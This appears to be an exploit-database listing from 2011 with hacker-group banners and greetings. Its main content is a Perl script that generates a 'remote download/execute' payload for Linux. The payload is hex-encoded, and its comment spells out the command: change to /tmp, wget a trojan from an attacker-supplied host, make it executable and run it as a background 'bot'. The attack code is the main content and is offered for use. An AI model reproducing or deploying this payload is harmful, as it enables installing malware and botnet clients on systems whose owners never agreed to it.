linux/x86 Remote Download/Execute File - 44 Bytes + File

2011-05-04T00:00:00
ID 1337DAY-ID-16028
Type zdt
Reporter KedAns-Dz
Modified 2011-05-04T00:00:00

Description

Exploit for linux/x86 platform in category shellcode

                                        
                                            1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

#!/usr/bin/perl
sub logo(){
print q'                                                                                                      
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
1                      ______                                          0
0                   .-"      "-.                                       1
1                  / KedAns-Dz  \ =-=-=-=-=-=-=-=-=-=-=-|              0
0 Algerian HaCker |              | > Site : 1337day.com |              1
1 --------------- |,  .-.  .-.  ,| > Twitter : @kedans  |              0
0                 | )(_o/  \o_)( | > ked-h@hotmail.com  |              1
1                 |/     /\     \| =-=-=-=-=-=-=-=-=-=-=|              0
0       (@_       (_     ^^     _)  HaCkerS-StreeT-Team                1
1  _     ) \_______\__|IIIIII|__/_______________________               0
0 (_)@8@8{}<________|-\IIIIII/-|________________________>              1
1        )_/        \          /                                       0
0       (@           `--------` © 2011, Inj3ct0r Team                  1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
0 Shellcode Linux/x86 Remote Download/Execute File - 44 Bytes + File   1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
';
}
###
# Shellcode Linux/x86 Remote Download/Execute File - 44 Bytes + File
# Platform (Linux) - ARCH (x86) - Type (Shellcode)
# Tested on : Linux/x86 - Ubuntu - (10.10 & 8.14 'BT4')
# Provided By : KedAns-Dz
##
# Unreal IRCD 3.2.8.1 Remote Download/Execute
# Real Provider (anonymous) > http://exploit-db.com/exploits/13853
###
logo();
$ARGC=@ARGV;
if ($ARGC!=1) { 
   print "\n [!] Usage: $0 [Tr0j4n3-HoSt] \n"; 
   die " [*] f.ex: $0 http://1337day.com/attack.txt \n";
}
my $FILE = shift;
my $leng = length($FILE)+44; # 44 - default length of shellcode
my $shellcode = # cd /tmp; wget [TroJ4n3-HoSt] -O bot; chmod +x bot; ./bot &
'\x63\x64\x20\x2f\x74\x6d\x70\x3b\x20\x77\x67\x65\x74\x20'.$FILE.
'\x20\x2d\x4f\x20\x62\x6f\x74\x3b\x20\x63\x68\x6d\x6f\x64\x20\x2b'.
'\x78\x20\x62\x6f\x74\x3b\x20\x2e\x2f\x62\x6f\x74\x20\x26';
print"\n\n [+] File : ".$FILE."\n [+] Length : ".$leng." Bytes\n [+] Shellcode :\n\n".$shellcode."\n";

#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================  
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) 
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix *
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ .... 
# Exploit-Id Team : jos_ali_joe + Caddy-Dz (exploit-id.com) ... All Others * TreX (hotturks.org) 
# JaGo-Dz (sec4ever.com) * KelvinX (kelvinx.net) * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================



#  0day.today [2016-04-20]  #